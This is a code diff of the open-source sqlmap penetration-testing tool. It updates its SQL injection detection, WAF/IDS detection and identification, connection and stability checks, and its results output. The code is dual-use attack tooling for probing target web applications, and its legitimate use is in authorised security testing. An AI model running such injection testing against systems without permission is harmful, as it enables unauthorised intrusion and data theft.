output = output or extractRegexResult(check, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None, re.DOTALL | re.IGNORECASE)
|
||||||
or extractRegexResult(check, listToStrValue([headers[key] for key in headers.keys() if key.lower() != URI_HTTP_HEADER.lower()] if headers else None), re.DOTALL | re.IGNORECASE) \
|
output = output or extractRegexResult(check, listToStrValue((headers[key] for key in headers.keys() if key.lower() != URI_HTTP_HEADER.lower()) if headers else None), re.DOTALL | re.IGNORECASE)
|
||||||
or extractRegexResult(check, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None, re.DOTALL | re.IGNORECASE)
|
output = output or extractRegexResult(check, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None, re.DOTALL | re.IGNORECASE)
|
||||||
|
|
||||||
if output:
|
if output:
|
||||||
result = output == "1"
|
result = output == "1"
|
||||||
@@ -618,13 +659,16 @@ def checkSqlInjection(place, parameter, value):
|
|||||||
|
|
||||||
configUnion(test.request.char, test.request.columns)
|
configUnion(test.request.char, test.request.columns)
|
||||||
|
|
||||||
if not Backend.getIdentifiedDbms():
|
if len(kb.dbmsFilter or []) == 1:
|
||||||
|
Backend.forceDbms(kb.dbmsFilter[0])
|
||||||
|
elif not Backend.getIdentifiedDbms():
|
||||||
if kb.heuristicDbms is None:
|
if kb.heuristicDbms is None:
|
||||||
warnMsg = "using unescaped version of the test "
|
if kb.heuristicTest == HEURISTIC_TEST.POSITIVE or injection.data:
|
||||||
warnMsg += "because of zero knowledge of the "
|
warnMsg = "using unescaped version of the test "
|
||||||
warnMsg += "back-end DBMS. You can try to "
|
warnMsg += "because of zero knowledge of the "
|
||||||
warnMsg += "explicitly set it with option '--dbms'"
|
warnMsg += "back-end DBMS. You can try to "
|
||||||
singleTimeWarnMessage(warnMsg)
|
warnMsg += "explicitly set it with option '--dbms'"
|
||||||
|
singleTimeWarnMessage(warnMsg)
|
||||||
else:
|
else:
|
||||||
Backend.forceDbms(kb.heuristicDbms)
|
Backend.forceDbms(kb.heuristicDbms)
|
||||||
|
|
||||||
@@ -634,18 +678,6 @@ def checkSqlInjection(place, parameter, value):
|
|||||||
infoMsg += "there is at least one other (potential) "
|
infoMsg += "there is at least one other (potential) "
|
||||||
infoMsg += "technique found"
|
infoMsg += "technique found"
|
||||||
singleTimeLogMessage(infoMsg)
|
singleTimeLogMessage(infoMsg)
|
||||||
elif not injection.data:
|
|
||||||
_ = test.request.columns.split('-')[-1]
|
|
||||||
if _.isdigit() and int(_) > 10:
|
|
||||||
if kb.futileUnion is None:
|
|
||||||
msg = "it is not recommended to perform "
|
|
||||||
msg += "extended UNION tests if there is not "
|
|
||||||
msg += "at least one other (potential) "
|
|
||||||
msg += "technique found. Do you want to skip? [Y/n] "
|
|
||||||
|
|
||||||
kb.futileUnion = not readInput(msg, default='Y', boolean=True)
|
|
||||||
if kb.futileUnion is False:
|
|
||||||
continue
|
|
||||||
|
|
||||||
# Test for UNION query SQL injection
|
# Test for UNION query SQL injection
|
||||||
reqPayload, vector = unionTest(comment, place, parameter, value, prefix, suffix)
|
reqPayload, vector = unionTest(comment, place, parameter, value, prefix, suffix)
|
||||||
@@ -662,7 +694,7 @@ def checkSqlInjection(place, parameter, value):
|
|||||||
|
|
||||||
kb.previousMethod = method
|
kb.previousMethod = method
|
||||||
|
|
||||||
if conf.dummy or conf.offline:
|
if conf.offline:
|
||||||
injectable = False
|
injectable = False
|
||||||
|
|
||||||
# If the injection test was successful feed the injection
|
# If the injection test was successful feed the injection
|
||||||
@@ -751,7 +783,7 @@ def checkSqlInjection(place, parameter, value):
|
|||||||
|
|
||||||
if conf.multipleTargets:
|
if conf.multipleTargets:
|
||||||
msg = "how do you want to proceed? [ne(X)t target/(s)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit]"
|
msg = "how do you want to proceed? [ne(X)t target/(s)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit]"
|
||||||
choice = readInput(msg, default='T', checkBatch=False).upper()
|
choice = readInput(msg, default='X', checkBatch=False).upper()
|
||||||
else:
|
else:
|
||||||
msg = "how do you want to proceed? [(S)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit]"
|
msg = "how do you want to proceed? [(S)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit]"
|
||||||
choice = readInput(msg, default='S', checkBatch=False).upper()
|
choice = readInput(msg, default='S', checkBatch=False).upper()
|
||||||
@@ -804,6 +836,7 @@ def checkSqlInjection(place, parameter, value):
|
|||||||
|
|
||||||
return injection
|
return injection
|
||||||
|
|
||||||
|
@stackedmethod
|
||||||
def heuristicCheckDbms(injection):
|
def heuristicCheckDbms(injection):
|
||||||
"""
|
"""
|
||||||
This functions is called when boolean-based blind is identified with a
|
This functions is called when boolean-based blind is identified with a
|
||||||
@@ -840,6 +873,7 @@ def heuristicCheckDbms(injection):
|
|||||||
|
|
||||||
return retVal
|
return retVal
|
||||||
|
|
||||||
|
@stackedmethod
|
||||||
def checkFalsePositives(injection):
|
def checkFalsePositives(injection):
|
||||||
"""
|
"""
|
||||||
Checks for false positives (only in single special cases)
|
Checks for false positives (only in single special cases)
|
||||||
@@ -847,8 +881,7 @@ def checkFalsePositives(injection):
|
|||||||
|
|
||||||
retVal = True
|
retVal = True
|
||||||
|
|
||||||
if all(_ in (PAYLOAD.TECHNIQUE.BOOLEAN, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED) for _ in injection.data) or\
|
if all(_ in (PAYLOAD.TECHNIQUE.BOOLEAN, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED) for _ in injection.data) or (len(injection.data) == 1 and PAYLOAD.TECHNIQUE.UNION in injection.data and "Generic" in injection.data[PAYLOAD.TECHNIQUE.UNION].title):
|
||||||
(len(injection.data) == 1 and PAYLOAD.TECHNIQUE.UNION in injection.data and "Generic" in injection.data[PAYLOAD.TECHNIQUE.UNION].title):
|
|
||||||
pushValue(kb.injection)
|
pushValue(kb.injection)
|
||||||
|
|
||||||
infoMsg = "checking if the injection point on %s " % injection.place
|
infoMsg = "checking if the injection point on %s " % injection.place
|
||||||
@@ -902,6 +935,7 @@ def checkFalsePositives(injection):
|
|||||||
|
|
||||||
return retVal
|
return retVal
|
||||||
|
|
||||||
|
@stackedmethod
|
||||||
def checkSuhosinPatch(injection):
|
def checkSuhosinPatch(injection):
|
||||||
"""
|
"""
|
||||||
Checks for existence of Suhosin-patch (and alike) protection mechanism(s)
|
Checks for existence of Suhosin-patch (and alike) protection mechanism(s)
|
||||||
@@ -909,7 +943,7 @@ def checkSuhosinPatch(injection):
|
|||||||
|
|
||||||
if injection.place == PLACE.GET:
|
if injection.place == PLACE.GET:
|
||||||
debugMsg = "checking for parameter length "
|
debugMsg = "checking for parameter length "
|
||||||
debugMsg += "constrainting mechanisms"
|
debugMsg += "constraining mechanisms"
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
|
|
||||||
pushValue(kb.injection)
|
pushValue(kb.injection)
|
||||||
@@ -918,13 +952,14 @@ def checkSuhosinPatch(injection):
|
|||||||
randInt = randomInt()
|
randInt = randomInt()
|
||||||
|
|
||||||
if not checkBooleanExpression("%d=%s%d" % (randInt, ' ' * SUHOSIN_MAX_VALUE_LENGTH, randInt)):
|
if not checkBooleanExpression("%d=%s%d" % (randInt, ' ' * SUHOSIN_MAX_VALUE_LENGTH, randInt)):
|
||||||
warnMsg = "parameter length constrainting "
|
warnMsg = "parameter length constraining "
|
||||||
warnMsg += "mechanism detected (e.g. Suhosin patch). "
|
warnMsg += "mechanism detected (e.g. Suhosin patch). "
|
||||||
warnMsg += "Potential problems in enumeration phase can be expected"
|
warnMsg += "Potential problems in enumeration phase can be expected"
|
||||||
logger.warn(warnMsg)
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
kb.injection = popValue()
|
kb.injection = popValue()
|
||||||
|
|
||||||
|
@stackedmethod
|
||||||
def checkFilteredChars(injection):
|
def checkFilteredChars(injection):
|
||||||
debugMsg = "checking for filtered characters"
|
debugMsg = "checking for filtered characters"
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
@@ -945,7 +980,7 @@ def checkFilteredChars(injection):
|
|||||||
|
|
||||||
# inference techniques depend on character '>'
|
# inference techniques depend on character '>'
|
||||||
if not any(_ in injection.data for _ in (PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.QUERY)):
|
if not any(_ in injection.data for _ in (PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.QUERY)):
|
||||||
if not checkBooleanExpression("%d>%d" % (randInt+1, randInt)):
|
if not checkBooleanExpression("%d>%d" % (randInt + 1, randInt)):
|
||||||
warnMsg = "it appears that the character '>' is "
|
warnMsg = "it appears that the character '>' is "
|
||||||
warnMsg += "filtered by the back-end server. You are strongly "
|
warnMsg += "filtered by the back-end server. You are strongly "
|
||||||
warnMsg += "advised to rerun with the '--tamper=between'"
|
warnMsg += "advised to rerun with the '--tamper=between'"
|
||||||
@@ -959,6 +994,11 @@ def heuristicCheckSqlInjection(place, parameter):
|
|||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
return None
|
return None
|
||||||
|
|
||||||
|
if kb.heavilyDynamic:
|
||||||
|
debugMsg = "heuristic check skipped because of heavy dynamicity"
|
||||||
|
logger.debug(debugMsg)
|
||||||
|
return None
|
||||||
|
|
||||||
origValue = conf.paramDict[place][parameter]
|
origValue = conf.paramDict[place][parameter]
|
||||||
paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place
|
paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place
|
||||||
|
|
||||||
@@ -1042,13 +1082,13 @@ def heuristicCheckSqlInjection(place, parameter):
|
|||||||
|
|
||||||
if value.lower() in (page or "").lower():
|
if value.lower() in (page or "").lower():
|
||||||
infoMsg = "heuristic (XSS) test shows that %s parameter " % paramType
|
infoMsg = "heuristic (XSS) test shows that %s parameter " % paramType
|
||||||
infoMsg += "'%s' might be vulnerable to cross-site scripting attacks" % parameter
|
infoMsg += "'%s' might be vulnerable to cross-site scripting (XSS) attacks" % parameter
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
for match in re.finditer(FI_ERROR_REGEX, page or ""):
|
for match in re.finditer(FI_ERROR_REGEX, page or ""):
|
||||||
if randStr1.lower() in match.group(0).lower():
|
if randStr1.lower() in match.group(0).lower():
|
||||||
infoMsg = "heuristic (FI) test shows that %s parameter " % paramType
|
infoMsg = "heuristic (FI) test shows that %s parameter " % paramType
|
||||||
infoMsg += "'%s' might be vulnerable to file inclusion attacks" % parameter
|
infoMsg += "'%s' might be vulnerable to file inclusion (FI) attacks" % parameter
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
break
|
break
|
||||||
|
|
||||||
@@ -1134,16 +1174,18 @@ def checkDynamicContent(firstPage, secondPage):
|
|||||||
count += 1
|
count += 1
|
||||||
|
|
||||||
if count > conf.retries:
|
if count > conf.retries:
|
||||||
warnMsg = "target URL is too dynamic. "
|
warnMsg = "target URL content appears to be too dynamic. "
|
||||||
warnMsg += "Switching to '--text-only' "
|
warnMsg += "Switching to '--text-only' "
|
||||||
logger.warn(warnMsg)
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
conf.textOnly = True
|
conf.textOnly = True
|
||||||
return
|
return
|
||||||
|
|
||||||
warnMsg = "target URL is heavily dynamic"
|
warnMsg = "target URL content appears to be heavily dynamic. "
|
||||||
warnMsg += ". sqlmap is going to retry the request"
|
warnMsg += "sqlmap is going to retry the request(s)"
|
||||||
logger.critical(warnMsg)
|
singleTimeLogMessage(warnMsg, logging.CRITICAL)
|
||||||
|
|
||||||
|
kb.heavilyDynamic = True
|
||||||
|
|
||||||
secondPage, _, _ = Request.queryPage(content=True)
|
secondPage, _, _ = Request.queryPage(content=True)
|
||||||
findDynamicContent(firstPage, secondPage)
|
findDynamicContent(firstPage, secondPage)
|
||||||
@@ -1159,7 +1201,7 @@ def checkStability():
|
|||||||
like for instance string matching (--string).
|
like for instance string matching (--string).
|
||||||
"""
|
"""
|
||||||
|
|
||||||
infoMsg = "testing if the target URL is stable"
|
infoMsg = "testing if the target URL content is stable"
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
firstPage = kb.originalPage # set inside checkConnection()
|
firstPage = kb.originalPage # set inside checkConnection()
|
||||||
@@ -1177,7 +1219,7 @@ def checkStability():
|
|||||||
|
|
||||||
if kb.pageStable:
|
if kb.pageStable:
|
||||||
if firstPage:
|
if firstPage:
|
||||||
infoMsg = "target URL is stable"
|
infoMsg = "target URL content is stable"
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
else:
|
else:
|
||||||
errMsg = "there was an error checking the stability of page "
|
errMsg = "there was an error checking the stability of page "
|
||||||
@@ -1187,12 +1229,11 @@ def checkStability():
|
|||||||
logger.error(errMsg)
|
logger.error(errMsg)
|
||||||
|
|
||||||
else:
|
else:
|
||||||
warnMsg = "target URL is not stable. sqlmap will base the page "
|
warnMsg = "target URL content is not stable. sqlmap will base the page "
|
||||||
warnMsg += "comparison on a sequence matcher. If no dynamic nor "
|
warnMsg += "comparison on a sequence matcher. If no dynamic nor "
|
||||||
warnMsg += "injectable parameters are detected, or in case of "
|
warnMsg += "injectable parameters are detected, or in case of "
|
||||||
warnMsg += "junk results, refer to user's manual paragraph "
|
warnMsg += "junk results, refer to user's manual paragraph "
|
||||||
warnMsg += "'Page comparison' and provide a string or regular "
|
warnMsg += "'Page comparison'"
|
||||||
warnMsg += "expression to match on"
|
|
||||||
logger.warn(warnMsg)
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
message = "how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] "
|
message = "how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] "
|
||||||
@@ -1281,6 +1322,7 @@ def checkRegexp():
|
|||||||
|
|
||||||
return True
|
return True
|
||||||
|
|
||||||
|
@stackedmethod
|
||||||
def checkWaf():
|
def checkWaf():
|
||||||
"""
|
"""
|
||||||
Reference: http://seclists.org/nmap-dev/2011/q2/att-1005/http-waf-detect.nse
|
Reference: http://seclists.org/nmap-dev/2011/q2/att-1005/http-waf-detect.nse
|
||||||
@@ -1307,14 +1349,19 @@ def checkWaf():
|
|||||||
retVal = False
|
retVal = False
|
||||||
payload = "%d %s" % (randomInt(), IDS_WAF_CHECK_PAYLOAD)
|
payload = "%d %s" % (randomInt(), IDS_WAF_CHECK_PAYLOAD)
|
||||||
|
|
||||||
value = "" if not conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + DEFAULT_GET_POST_DELIMITER
|
if PLACE.URI in conf.parameters:
|
||||||
value += agent.addPayloadDelimiters("%s=%s" % (randomStr(), payload))
|
place = PLACE.POST
|
||||||
|
value = "%s=%s" % (randomStr(), agent.addPayloadDelimiters(payload))
|
||||||
|
else:
|
||||||
|
place = PLACE.GET
|
||||||
|
value = "" if not conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + DEFAULT_GET_POST_DELIMITER
|
||||||
|
value += "%s=%s" % (randomStr(), agent.addPayloadDelimiters(payload))
|
||||||
|
|
||||||
pushValue(conf.timeout)
|
pushValue(conf.timeout)
|
||||||
conf.timeout = IDS_WAF_CHECK_TIMEOUT
|
conf.timeout = IDS_WAF_CHECK_TIMEOUT
|
||||||
|
|
||||||
try:
|
try:
|
||||||
retVal = Request.queryPage(place=PLACE.GET, value=value, getRatioValue=True, noteResponseTime=False, silent=True)[1] < IDS_WAF_CHECK_RATIO
|
retVal = Request.queryPage(place=place, value=value, getRatioValue=True, noteResponseTime=False, silent=True, disableTampering=True)[1] < IDS_WAF_CHECK_RATIO
|
||||||
except SqlmapConnectionException:
|
except SqlmapConnectionException:
|
||||||
retVal = True
|
retVal = True
|
||||||
finally:
|
finally:
|
||||||
@@ -1341,6 +1388,7 @@ def checkWaf():
|
|||||||
|
|
||||||
return retVal
|
return retVal
|
||||||
|
|
||||||
|
@stackedmethod
|
||||||
def identifyWaf():
|
def identifyWaf():
|
||||||
if not conf.identifyWaf:
|
if not conf.identifyWaf:
|
||||||
return None
|
return None
|
||||||
@@ -1374,6 +1422,9 @@ def identifyWaf():
|
|||||||
retVal = []
|
retVal = []
|
||||||
|
|
||||||
for function, product in kb.wafFunctions:
|
for function, product in kb.wafFunctions:
|
||||||
|
if retVal and "unknown" in product.lower():
|
||||||
|
continue
|
||||||
|
|
||||||
try:
|
try:
|
||||||
logger.debug("checking for WAF/IPS/IDS product '%s'" % product)
|
logger.debug("checking for WAF/IPS/IDS product '%s'" % product)
|
||||||
found = function(_)
|
found = function(_)
|
||||||
@@ -1400,7 +1451,7 @@ def identifyWaf():
|
|||||||
message = "WAF/IPS/IDS specific response can be found in '%s'. " % filename
|
message = "WAF/IPS/IDS specific response can be found in '%s'. " % filename
|
||||||
message += "If you know the details on used protection please "
|
message += "If you know the details on used protection please "
|
||||||
message += "report it along with specific response "
|
message += "report it along with specific response "
|
||||||
message += "to 'dev@sqlmap.org'"
|
message += "to '%s'" % DEV_EMAIL_ADDRESS
|
||||||
logger.warn(message)
|
logger.warn(message)
|
||||||
|
|
||||||
message = "are you sure that you want to "
|
message = "are you sure that you want to "
|
||||||
@@ -1422,6 +1473,7 @@ def identifyWaf():
|
|||||||
|
|
||||||
return retVal
|
return retVal
|
||||||
|
|
||||||
|
@stackedmethod
|
||||||
def checkNullConnection():
|
def checkNullConnection():
|
||||||
"""
|
"""
|
||||||
Reference: http://www.wisec.it/sectou.php?id=472f952d79293
|
Reference: http://www.wisec.it/sectou.php?id=472f952d79293
|
||||||
@@ -1433,16 +1485,16 @@ def checkNullConnection():
|
|||||||
infoMsg = "testing NULL connection to the target URL"
|
infoMsg = "testing NULL connection to the target URL"
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
try:
|
pushValue(kb.pageCompress)
|
||||||
pushValue(kb.pageCompress)
|
kb.pageCompress = False
|
||||||
kb.pageCompress = False
|
|
||||||
|
|
||||||
page, headers, _ = Request.getPage(method=HTTPMETHOD.HEAD)
|
try:
|
||||||
|
page, headers, _ = Request.getPage(method=HTTPMETHOD.HEAD, raise404=False)
|
||||||
|
|
||||||
if not page and HTTP_HEADER.CONTENT_LENGTH in (headers or {}):
|
if not page and HTTP_HEADER.CONTENT_LENGTH in (headers or {}):
|
||||||
kb.nullConnection = NULLCONNECTION.HEAD
|
kb.nullConnection = NULLCONNECTION.HEAD
|
||||||
|
|
||||||
infoMsg = "NULL connection is supported with HEAD method (Content-Length)"
|
infoMsg = "NULL connection is supported with HEAD method ('Content-Length')"
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
else:
|
else:
|
||||||
page, headers, _ = Request.getPage(auxHeaders={HTTP_HEADER.RANGE: "bytes=-1"})
|
page, headers, _ = Request.getPage(auxHeaders={HTTP_HEADER.RANGE: "bytes=-1"})
|
||||||
@@ -1450,11 +1502,10 @@ def checkNullConnection():
|
|||||||
if page and len(page) == 1 and HTTP_HEADER.CONTENT_RANGE in (headers or {}):
|
if page and len(page) == 1 and HTTP_HEADER.CONTENT_RANGE in (headers or {}):
|
||||||
kb.nullConnection = NULLCONNECTION.RANGE
|
kb.nullConnection = NULLCONNECTION.RANGE
|
||||||
|
|
||||||
infoMsg = "NULL connection is supported with GET method (Range)"
|
infoMsg = "NULL connection is supported with GET method ('Range')"
|
||||||
infoMsg += "'%s'" % kb.nullConnection
|
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
else:
|
else:
|
||||||
_, headers, _ = Request.getPage(skipRead = True)
|
_, headers, _ = Request.getPage(skipRead=True)
|
||||||
|
|
||||||
if HTTP_HEADER.CONTENT_LENGTH in (headers or {}):
|
if HTTP_HEADER.CONTENT_LENGTH in (headers or {}):
|
||||||
kb.nullConnection = NULLCONNECTION.SKIP_READ
|
kb.nullConnection = NULLCONNECTION.SKIP_READ
|
||||||
@@ -1462,9 +1513,8 @@ def checkNullConnection():
|
|||||||
infoMsg = "NULL connection is supported with 'skip-read' method"
|
infoMsg = "NULL connection is supported with 'skip-read' method"
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
except SqlmapConnectionException, ex:
|
except SqlmapConnectionException:
|
||||||
errMsg = getSafeExString(ex)
|
pass
|
||||||
raise SqlmapConnectionException(errMsg)
|
|
||||||
|
|
||||||
finally:
|
finally:
|
||||||
kb.pageCompress = popValue()
|
kb.pageCompress = popValue()
|
||||||
@@ -1472,18 +1522,19 @@ def checkNullConnection():
|
|||||||
return kb.nullConnection is not None
|
return kb.nullConnection is not None
|
||||||
|
|
||||||
def checkConnection(suppressOutput=False):
|
def checkConnection(suppressOutput=False):
|
||||||
if not any((conf.proxy, conf.tor, conf.dummy, conf.offline)):
|
if not re.search(r"\A\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\Z", conf.hostname):
|
||||||
try:
|
if not any((conf.proxy, conf.tor, conf.dummy, conf.offline)):
|
||||||
debugMsg = "resolving hostname '%s'" % conf.hostname
|
try:
|
||||||
logger.debug(debugMsg)
|
debugMsg = "resolving hostname '%s'" % conf.hostname
|
||||||
socket.getaddrinfo(conf.hostname, None)
|
logger.debug(debugMsg)
|
||||||
except socket.gaierror:
|
socket.getaddrinfo(conf.hostname, None)
|
||||||
errMsg = "host '%s' does not exist" % conf.hostname
|
except socket.gaierror:
|
||||||
raise SqlmapConnectionException(errMsg)
|
errMsg = "host '%s' does not exist" % conf.hostname
|
||||||
except socket.error, ex:
|
raise SqlmapConnectionException(errMsg)
|
||||||
errMsg = "problem occurred while "
|
except socket.error, ex:
|
||||||
errMsg += "resolving a host name '%s' ('%s')" % (conf.hostname, getSafeExString(ex))
|
errMsg = "problem occurred while "
|
||||||
raise SqlmapConnectionException(errMsg)
|
errMsg += "resolving a host name '%s' ('%s')" % (conf.hostname, getSafeExString(ex))
|
||||||
|
raise SqlmapConnectionException(errMsg)
|
||||||
|
|
||||||
if not suppressOutput and not conf.dummy and not conf.offline:
|
if not suppressOutput and not conf.dummy and not conf.offline:
|
||||||
infoMsg = "testing connection to the target URL"
|
infoMsg = "testing connection to the target URL"
|
||||||
@@ -1504,12 +1555,22 @@ def checkConnection(suppressOutput=False):
|
|||||||
warnMsg += "which could interfere with the results of the tests"
|
warnMsg += "which could interfere with the results of the tests"
|
||||||
logger.warn(warnMsg)
|
logger.warn(warnMsg)
|
||||||
elif wasLastResponseHTTPError():
|
elif wasLastResponseHTTPError():
|
||||||
warnMsg = "the web server responded with an HTTP error code (%d) " % getLastRequestHTTPError()
|
if getLastRequestHTTPError() != conf.ignoreCode:
|
||||||
warnMsg += "which could interfere with the results of the tests"
|
warnMsg = "the web server responded with an HTTP error code (%d) " % getLastRequestHTTPError()
|
||||||
logger.warn(warnMsg)
|
warnMsg += "which could interfere with the results of the tests"
|
||||||
|
logger.warn(warnMsg)
|
||||||
else:
|
else:
|
||||||
kb.errorIsNone = True
|
kb.errorIsNone = True
|
||||||
|
|
||||||
|
threadData = getCurrentThreadData()
|
||||||
|
|
||||||
|
if kb.redirectChoice == REDIRECTION.YES and threadData.lastRedirectURL and threadData.lastRedirectURL[0] == threadData.lastRequestUID:
|
||||||
|
if (threadData.lastRedirectURL[1] or "").startswith("https://") and unicodeencode(conf.hostname) in threadData.lastRedirectURL[1]:
|
||||||
|
conf.url = re.sub(r"https?://", "https://", conf.url)
|
||||||
|
match = re.search(r":(\d+)", threadData.lastRedirectURL[1])
|
||||||
|
port = match.group(1) if match else 443
|
||||||
|
conf.url = re.sub(r":\d+/", ":%s/" % port, conf.url)
|
||||||
|
|
||||||
except SqlmapConnectionException, ex:
|
except SqlmapConnectionException, ex:
|
||||||
if conf.ipv6:
|
if conf.ipv6:
|
||||||
warnMsg = "check connection to a provided "
|
warnMsg = "check connection to a provided "
|
||||||
@@ -1540,8 +1601,8 @@ def checkInternet():
|
|||||||
content = Request.getPage(url=CHECK_INTERNET_ADDRESS, checking=True)[0]
|
content = Request.getPage(url=CHECK_INTERNET_ADDRESS, checking=True)[0]
|
||||||
return CHECK_INTERNET_VALUE in (content or "")
|
return CHECK_INTERNET_VALUE in (content or "")
|
||||||
|
|
||||||
def setVerbosity(): # Cross-linked function
|
def setVerbosity(): # Cross-referenced function
|
||||||
raise NotImplementedError
|
raise NotImplementedError
|
||||||
|
|
||||||
def setWafFunctions(): # Cross-linked function
|
def setWafFunctions(): # Cross-referenced function
|
||||||
raise NotImplementedError
|
raise NotImplementedError
|
||||||
|
|||||||
@@ -1,8 +1,8 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
import os
|
import os
|
||||||
@@ -43,6 +43,7 @@ from lib.core.common import urldecode
|
|||||||
from lib.core.data import conf
|
from lib.core.data import conf
|
||||||
from lib.core.data import kb
|
from lib.core.data import kb
|
||||||
from lib.core.data import logger
|
from lib.core.data import logger
|
||||||
|
from lib.core.decorators import stackedmethod
|
||||||
from lib.core.enums import CONTENT_TYPE
|
from lib.core.enums import CONTENT_TYPE
|
||||||
from lib.core.enums import HASHDB_KEYS
|
from lib.core.enums import HASHDB_KEYS
|
||||||
from lib.core.enums import HEURISTIC_TEST
|
from lib.core.enums import HEURISTIC_TEST
|
||||||
@@ -152,12 +153,15 @@ def _formatInjection(inj):
|
|||||||
vector = "%s%s" % (vector, comment)
|
vector = "%s%s" % (vector, comment)
|
||||||
data += " Type: %s\n" % PAYLOAD.SQLINJECTION[stype]
|
data += " Type: %s\n" % PAYLOAD.SQLINJECTION[stype]
|
||||||
data += " Title: %s\n" % title
|
data += " Title: %s\n" % title
|
||||||
data += " Payload: %s\n" % urldecode(payload, unsafe="&", plusspace=(inj.place != PLACE.GET and kb.postSpaceToPlus))
|
data += " Payload: %s\n" % urldecode(payload, unsafe="&", spaceplus=(inj.place != PLACE.GET and kb.postSpaceToPlus))
|
||||||
data += " Vector: %s\n\n" % vector if conf.verbose > 1 else "\n"
|
data += " Vector: %s\n\n" % vector if conf.verbose > 1 else "\n"
|
||||||
|
|
||||||
return data
|
return data
|
||||||
|
|
||||||
def _showInjections():
|
def _showInjections():
|
||||||
|
if conf.wizard and kb.wizardMode:
|
||||||
|
kb.wizardMode = False
|
||||||
|
|
||||||
if kb.testQueryCount > 0:
|
if kb.testQueryCount > 0:
|
||||||
header = "sqlmap identified the following injection point(s) with "
|
header = "sqlmap identified the following injection point(s) with "
|
||||||
header += "a total of %d HTTP(s) requests" % kb.testQueryCount
|
header += "a total of %d HTTP(s) requests" % kb.testQueryCount
|
||||||
@@ -242,12 +246,15 @@ def _saveToResultsFile():
|
|||||||
for key, value in results.items():
|
for key, value in results.items():
|
||||||
place, parameter, notes = key
|
place, parameter, notes = key
|
||||||
line = "%s,%s,%s,%s,%s%s" % (safeCSValue(kb.originalUrls.get(conf.url) or conf.url), place, parameter, "".join(techniques[_][0].upper() for _ in sorted(value)), notes, os.linesep)
|
line = "%s,%s,%s,%s,%s%s" % (safeCSValue(kb.originalUrls.get(conf.url) or conf.url), place, parameter, "".join(techniques[_][0].upper() for _ in sorted(value)), notes, os.linesep)
|
||||||
conf.resultsFP.writelines(line)
|
conf.resultsFP.write(line)
|
||||||
|
|
||||||
if not results:
|
if not results:
|
||||||
line = "%s,,,,%s" % (conf.url, os.linesep)
|
line = "%s,,,,%s" % (conf.url, os.linesep)
|
||||||
conf.resultsFP.writelines(line)
|
conf.resultsFP.write(line)
|
||||||
|
|
||||||
|
conf.resultsFP.flush()
|
||||||
|
|
||||||
|
@stackedmethod
|
||||||
def start():
|
def start():
|
||||||
"""
|
"""
|
||||||
This function calls a function that performs checks on both URL
|
This function calls a function that performs checks on both URL
|
||||||
@@ -281,7 +288,7 @@ def start():
|
|||||||
try:
|
try:
|
||||||
|
|
||||||
if conf.checkInternet:
|
if conf.checkInternet:
|
||||||
infoMsg = "[INFO] checking for Internet connection"
|
infoMsg = "checking for Internet connection"
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
if not checkInternet():
|
if not checkInternet():
|
||||||
@@ -366,9 +373,8 @@ def start():
|
|||||||
conf.data = urldecode(conf.data) if conf.data and urlencode(DEFAULT_GET_POST_DELIMITER, None) not in conf.data else conf.data
|
conf.data = urldecode(conf.data) if conf.data and urlencode(DEFAULT_GET_POST_DELIMITER, None) not in conf.data else conf.data
|
||||||
|
|
||||||
else:
|
else:
|
||||||
if targetUrl.find("?") > -1:
|
if '?' in targetUrl:
|
||||||
firstPart = targetUrl[:targetUrl.find("?")]
|
firstPart, secondPart = targetUrl.split('?', 1)
|
||||||
secondPart = targetUrl[targetUrl.find("?") + 1:]
|
|
||||||
message = "Edit GET data [default: %s]: " % secondPart
|
message = "Edit GET data [default: %s]: " % secondPart
|
||||||
test = readInput(message, default=secondPart)
|
test = readInput(message, default=secondPart)
|
||||||
